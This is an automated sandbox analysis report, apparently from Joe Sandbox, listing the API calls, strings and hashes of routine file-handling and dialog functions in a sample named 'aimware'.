Opcode Fuzzy Hash: 61618d1152fc062a30790f175e2df6c99a5398e2f7967ec267e634476cb54aeb
Instruction Fuzzy Hash: 8EA011F22AA0C2BC3208A2022E03E3B022CC0C0B20332A82EF80288080A88028020832

Function 00ACE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE580

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dadb9ab23d492ca90f6cb88af3fd5018f4257f9dfe386b8d0daa2a394ecefc8a
Instruction ID: 42627a901af7e7173feeca0b071b704f46d971cffe39c880112937bc0e94bb27
Opcode Fuzzy Hash: dadb9ab23d492ca90f6cb88af3fd5018f4257f9dfe386b8d0daa2a394ecefc8a
Instruction Fuzzy Hash: 56A011E22AA082BC3008A2A22E02E3B022CC0C0B20332A82EF80280080A88008020A30

Function 00ACE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE580

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92890032f3076a627287cb0683c6d96926a22cbc27dab2851aca191c7c6f46a2
Instruction ID: 42627a901af7e7173feeca0b071b704f46d971cffe39c880112937bc0e94bb27
Opcode Fuzzy Hash: 92890032f3076a627287cb0683c6d96926a22cbc27dab2851aca191c7c6f46a2
Instruction Fuzzy Hash: 56A011E22AA082BC3008A2A22E02E3B022CC0C0B20332A82EF80280080A88008020A30

Function 00ACE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 696dc3a99572017ccc560775175eb5eb137760e4d7477c7221dc111c709c4ce5
Instruction ID: fb636b434d4a0d0e76bca176c5e7c80a7801b7ce834f9c2a2f84b1ad3069a9b1
Opcode Fuzzy Hash: 696dc3a99572017ccc560775175eb5eb137760e4d7477c7221dc111c709c4ce5
Instruction Fuzzy Hash: CAA011E22AA282BC3008A2022E02E3B022CC0C2F20332A82EF80280080A8800C020830

Function 00ACE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE580

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 114afe53aff38ffaab192f8afc6d1cfede218ad599948c92d29d122fa17385cb
Instruction ID: c1fd93403746c6815c6af77abf6c8bf698be553d397637dde9b4993c9ec96460
Opcode Fuzzy Hash: 114afe53aff38ffaab192f8afc6d1cfede218ad599948c92d29d122fa17385cb
Instruction Fuzzy Hash: 1CA011E22AA080BC3008A2A22E02E3B022CC0C0B22332AA2EF80080080A8800A020A30

Function 00ACE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 68d37f200b208984301c3fc2d54ce08013fba9e8266274ffdbb663fb47b26e82
Instruction ID: fb636b434d4a0d0e76bca176c5e7c80a7801b7ce834f9c2a2f84b1ad3069a9b1
Opcode Fuzzy Hash: 68d37f200b208984301c3fc2d54ce08013fba9e8266274ffdbb663fb47b26e82
Instruction Fuzzy Hash: CAA011E22AA282BC3008A2022E02E3B022CC0C2F20332A82EF80280080A8800C020830

Function 00ACE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd511f4118b9b368b0251a89ba20c88e2351fba6f309fc23eaf2bc61bc26f847
Instruction ID: fb636b434d4a0d0e76bca176c5e7c80a7801b7ce834f9c2a2f84b1ad3069a9b1
Opcode Fuzzy Hash: bd511f4118b9b368b0251a89ba20c88e2351fba6f309fc23eaf2bc61bc26f847
Instruction Fuzzy Hash: CAA011E22AA282BC3008A2022E02E3B022CC0C2F20332A82EF80280080A8800C020830

Function 00ACE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f401c6c1936836639cb4434a0dc28d1a7bac0fc468ab34bf6620068fbd59c4eb
Instruction ID: fb636b434d4a0d0e76bca176c5e7c80a7801b7ce834f9c2a2f84b1ad3069a9b1
Opcode Fuzzy Hash: f401c6c1936836639cb4434a0dc28d1a7bac0fc468ab34bf6620068fbd59c4eb
Instruction Fuzzy Hash: CAA011E22AA282BC3008A2022E02E3B022CC0C2F20332A82EF80280080A8800C020830

Function 00AB9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00AB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00AB9F0C

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 5d001f2b46e0d6a2ee5c931e5ef46da5a71734f9d3dbab8402d7aa7219b1ba6f
Instruction ID: d938b99efdf46ca4c647d38a18cee65716b45fa9046d8431df2249e5283137fa
Opcode Fuzzy Hash: 5d001f2b46e0d6a2ee5c931e5ef46da5a71734f9d3dbab8402d7aa7219b1ba6f
Instruction Fuzzy Hash: 60A0113008000A8ACE202B30CA0800C3B20EB20BC030002E8A00ACF0A2CB228A0B8B00

Function 00ACAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00ACAE72,C:\Users\user\Desktop,00000000,00AF946A,00000006), ref: 00ACAC08

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 1b17579ce484628634bcd69c8f906311463fa507394bc6536671584eb38c0a46
Instruction ID: aa232546f06e09c317057af95f9b83d3baeca0083c6b8a07f44e4160ad03d6b8
Opcode Fuzzy Hash: 1b17579ce484628634bcd69c8f906311463fa507394bc6536671584eb38c0a46
Instruction Fuzzy Hash: E0A01231100140878A004B318F4950E76556F51700F01C038600084030C730C820A600

Function 00AB9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00AB95D6,?,?,?,?,?,00AE2641,000000FF), ref: 00AB963B

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6e3b675e809548f999722f441cd08e653fdff59c7f0effa527b73eb06bbdbb17
Instruction ID: 144f37b1cf54a31df9be78e52c7f0ac22837b908306e932d16339cdd11eaddc5
Opcode Fuzzy Hash: 6e3b675e809548f999722f441cd08e653fdff59c7f0effa527b73eb06bbdbb17
Instruction Fuzzy Hash: DEF08971481B559FDB308B65C468BD377EC6B12321F041B1ED1E647AE1E761698D8B40

Non-executed Functions

Function 00ACC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB1316: GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
Part of subcall function 00AB1316: SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00ACC2B1
EndDialog.USER32(?,00000006), ref: 00ACC2C4
GetDlgItem.USER32(?,0000006C), ref: 00ACC2E0
SetFocus.USER32(00000000), ref: 00ACC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00ACC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00ACC358
FindFirstFileW.KERNEL32(?,?), ref: 00ACC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ACC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00ACC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00ACC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00ACC3D4
_swprintf.LIBCMT ref: 00ACC404

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00ACC417
FindClose.KERNEL32(00000000), ref: 00ACC41E
_swprintf.LIBCMT ref: 00ACC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00ACC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00ACC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00ACC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00ACC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00ACC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00ACC509
_swprintf.LIBCMT ref: 00ACC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00ACC548
_swprintf.LIBCMT ref: 00ACC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00ACC5AF

Part of subcall function 00ACAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00ACAF35
Part of subcall function 00ACAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00AEE72C,?,?), ref: 00ACAF84

Strings

REPLACEFILEDLG, xrefs: 00ACC247
%s %s %s, xrefs: 00ACC3F2, 00ACC527
%s %s, xrefs: 00ACC469, 00ACC58E

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 8947b7f59739bcc245060a48bb0612cde37a91dbd174365ed0fee4d0d652cd4a
Instruction ID: 96358c248b68b6621a76d59e963102aaa75d97b9b23d2c060715674c71a8044d
Opcode Fuzzy Hash: 8947b7f59739bcc245060a48bb0612cde37a91dbd174365ed0fee4d0d652cd4a
Instruction Fuzzy Hash: EE91B572148348BFE621EBA0DD49FFB77ECEB49B10F40481DF649D6081DB75AA058B62

Function 00AB6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB6FAA
_wcslen.LIBCMT ref: 00AB7013
_wcslen.LIBCMT ref: 00AB7084

Part of subcall function 00AB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00AB7AAB
Part of subcall function 00AB7A9C: GetLastError.KERNEL32 ref: 00AB7AF1
Part of subcall function 00AB7A9C: CloseHandle.KERNEL32(?), ref: 00AB7B00

Part of subcall function 00ABA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00AB977F,?,?,00AB95CF,?,?,?,?,?,00AE2641,000000FF), ref: 00ABA1F1
Part of subcall function 00ABA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00AB977F,?,?,00AB95CF,?,?,?,?,?,00AE2641), ref: 00ABA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00AB7139
CloseHandle.KERNEL32(00000000), ref: 00AB7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00AB7298

Part of subcall function 00AB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00AB73BC,?,?,?,00000000), ref: 00AB9DBC
Part of subcall function 00AB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00AB9E70

Part of subcall function 00AB9620: CloseHandle.KERNELBASE(000000FF,?,?,00AB95D6,?,?,?,?,?,00AE2641,000000FF), ref: 00AB963B

Part of subcall function 00ABA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00ABA325,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA501
Part of subcall function 00ABA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00ABA325,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA532

Strings

\??\, xrefs: 00AB702B
SeRestorePrivilege, xrefs: 00AB6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00AB6FCC
UNC\, xrefs: 00AB7051

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 18f396d0c8cab8cf1369e8b46bf9b4ae627812b69a706ea3c76f59ca82dd944f
Instruction ID: 32a1d7c75273e2550ddd3d4c673c0333efe0a256c488aa1e2a5a79baadc055a1
Opcode Fuzzy Hash: 18f396d0c8cab8cf1369e8b46bf9b4ae627812b69a706ea3c76f59ca82dd944f
Instruction Fuzzy Hash: B0C10471904644AADB21EBB4CD85FFEB7BCAF44300F00455AFA56E7283DB74AA44CB61

Function 00ADD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00ADDA34

Strings

1#IND, xrefs: 00ADEC2C
1#INF, xrefs: 00ADEC41
1#SNAN, xrefs: 00ADEC33
1#QNAN, xrefs: 00ADEC3A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 8a8ae4f76200ba0c59301118cad73fff993ad282bb4bd0f52066714f4c6fbb00
Instruction ID: 1cb8bf790d3c8b7d46f981ed05bbe713df00fd6758f828e6c666cf193bd66470
Opcode Fuzzy Hash: 8a8ae4f76200ba0c59301118cad73fff993ad282bb4bd0f52066714f4c6fbb00
Instruction Fuzzy Hash: 1FC21671E086298FDB25DF289D407EAB7B5EB44305F1541EBD84EEB240E779AE818F40

Function 00AB32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB3300
_swprintf.LIBCMT ref: 00AB36C7

Strings

hc%u, xrefs: 00AB370A
h%u, xrefs: 00AB36BC
CMT, xrefs: 00AB3A17

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 14418878b2bdb37cc6574928c3ffd61e32a25509d0bc32913af4d6b33dbdc306
Instruction ID: 46e63a19029ec5d51ade3a6b96691f772caedde6029226afe3515b0fadb45f93
Opcode Fuzzy Hash: 14418878b2bdb37cc6574928c3ffd61e32a25509d0bc32913af4d6b33dbdc306
Instruction Fuzzy Hash: FA32C572510284AFDF14DF74C996EEA3BA9AF15300F04457DFD8A8B283DB749A49CB20

Function 00AB286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB2874
_strlen.LIBCMT ref: 00AB2E3F

Part of subcall function 00AC02BA: __EH_prolog.LIBCMT ref: 00AC02BF

Part of subcall function 00AC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00ABBAE9,00000000,?,?,?,00010470), ref: 00AC1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB2F91

Strings

CMT, xrefs: 00AB2FBC

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
